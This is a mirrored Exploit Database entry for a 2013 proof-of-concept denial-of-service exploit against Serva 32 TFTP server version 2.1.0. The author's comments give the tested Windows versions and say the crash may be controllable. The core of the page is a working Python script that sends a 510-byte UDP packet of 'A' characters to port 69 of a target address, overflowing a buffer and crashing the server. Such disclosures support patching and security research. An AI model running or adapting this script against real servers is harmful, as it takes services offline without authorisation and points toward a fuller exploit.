Serva 32 TFTP 2.1.0 – Buffer Overflow (Denial of Service) (PoC)

• Exploit Database
• 19 阅读

• 作者： Sapling
  日期： 2013-05-15
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/25472/

• #Serva 32 TFTP Buffer overflow DoS
  #
  #05/14/2013
  #Sapling
  #Vendor homepage http://www.vercot.com/
  #Software Link:
  #http://www.vercot.com/~serva/download/Serva_Non-Supporter_32_v2.1.0.zip
  #Version 2.1.0 Only prior versions are not vulnerable
  #Tested on Windows 8, Windows 7, Windows XP SP1-3
  #CVE to be established today or tomorrow.
  #
  #This is the serva 32 Proof Of Concept exploit discovered and written by Sapling. At this
  #time the exploit is only a denial of service but evidence show it may be controllable.
  #The difficulty with controlling it at this point was the failure to overwrite the SEH
  #chains or bypass them. The crash occurs when sending a message longer than 509 bytes long
  
  #start of python file
  import sys
  import socket
  
  new = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  new.connect(('192.168.1.19', 69))
  new.send('\x41'*510)
  #end of python file